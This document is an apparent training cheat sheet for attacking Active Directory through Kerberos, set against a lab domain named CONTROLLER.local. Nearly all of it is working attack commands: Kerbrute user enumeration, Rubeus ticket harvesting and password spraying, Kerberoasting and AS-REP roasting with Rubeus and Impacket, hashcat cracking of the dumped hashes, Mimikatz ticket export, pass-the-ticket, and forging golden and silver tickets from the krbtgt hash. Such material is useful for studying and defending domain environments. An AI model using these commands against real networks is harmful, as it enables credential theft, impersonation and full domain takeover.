AD Attacking Kerberos
Kerbrute
Installation
- Download a precompiled binary for your OS - https://github.com/ropnop/kerbrute/releases 
- Rename kerbrute_linux_amd64 to kerbrute 
- chmod +x kerbrute- make kerbrute executable
Enumerating Users
- cd into the directory that you put Kerbrute 
- Download the wordlist to enumerate with here 
- Brute force user accounts from a domain controller using a supplied wordlist: 
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txtRubeus
Harvesting Tickets
Harvesting gathers tickets that are being transferred to the KDC and saves them for use in other attacks such as the pass the ticket attack.
C:\> cd Downloads #Navigate to the directory Rubeus is in
C:\> Rubeus.exe harvest /interval:30 #Tell Rubeus to harvest for TGTs every 30 secondsBrute-Forcing / Password-Spraying
Rubeus can both brute force passwords as well as password spray user accounts.
C:\> cd Downloads #Navigate to the directory Rubeus is in
C:\> Rubeus.exe brute /password:Password1 /noticket #This will take a given password and "spray" it against all found users then give the .kirbi TGT for that userKerberoasting
Rubeus
C:\> cd Downloads #Navigate to the directory Rubeus is in
C:\> Rubeus.exe kerberoast #This will dump the Kerberos hash of any kerberoastable usersCopy the hash to Kali into a .txt file so it can be cracked using hashcat:
hashcat -m 13100 -a 0 hash.txt Pass.txtImpacket
Impacket releases have been unstable since 0.9.20 I suggest getting an installation of Impacket < 0.9.20
Download the precompiled package from: https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19
cd Impacket-0.9.19 #Navigate to the impacket directory
pip install . #This will install all needed dependenciescd /usr/share/doc/python3-impacket/examples/ #Navigate to where GetUserSPNs.py is located
# Dump the Kerberos hash for all kerberoastable accounts it can find on the target domain just like Rubeus does; however, this does not have to be on the targets machine and can be done remotely.
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request 
# Crack the hash using hashcat
hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hashAS-REP Roasting
C:\> Rubeus.exe asreproast #Dumping KRBASREP5 Hashes
#Transfer the hash to Kali and put the hash into a txt file
#Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User...
#Crack those Hashes
hashcat -m 18200 hash.txt Pass.txtPass the Ticket
Prepare Mimikatz & Dump Tickets
C:\> cd Downloads #Navigate to the directory mimikatz is in
C:\> mimikatz.exe #Run mimikatz
mimikatz> privilege::debug #Ensure this outputs [output '20' OK] if it does not that means you do not have the administrator privileges to properly run mimikatz
mimikatz> sekurlsa::tickets /export #This will export all of the .kirbi tickets into the directory that you are currently inPass the Ticket
Now that we have our ticket ready we can now perform a pass the ticket attack to gain domain admin privileges.
#Run this command inside of mimikatz with the ticket that you harvested from earlier. 
# It will cache and impersonate the given ticket
mimikatz> kerberos::ptt <ticket> 
#Check that we successfully impersonated the ticket by listing our cached tickets.
mimikatz> klistYou now have impersonated the ticket giving you the same rights as the TGT you're impersonating.
Golden / Silver Ticket Attack
Dump the krbtgt hash
#Navigate to the directory mimikatz is in and run mimikatz
cd downloads && mimikatz.exe
mimikatz> privilege::debug #Ensure this outputs [privilege '20' ok]
#Dump the hash as well as the security identifier needed to create a Golden Ticket. 
#To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
mimikatz> lsadump::lsa /inject /name:krbtgt 
Create a Golden/Silver Ticket
Creating a golden ticket to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103:
mimikatz> kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:Demo:

Use the Golden/Silver Ticket to access other machines
This will open a new elevated command prompt with the given ticket in mimikatz:
mimikatz> misc::cmdAccess machines that you want, what you can access will depend on the privileges of the user that you decided to take the ticket from however if you took the ticket from krbtgt you have access to the ENTIRE network hence the name golden ticket; however, silver tickets only have access to those that the user has access to if it is a domain admin it can almost access the entire network however it is slightly less elevated from a golden ticket.
Last updated
Was this helpful?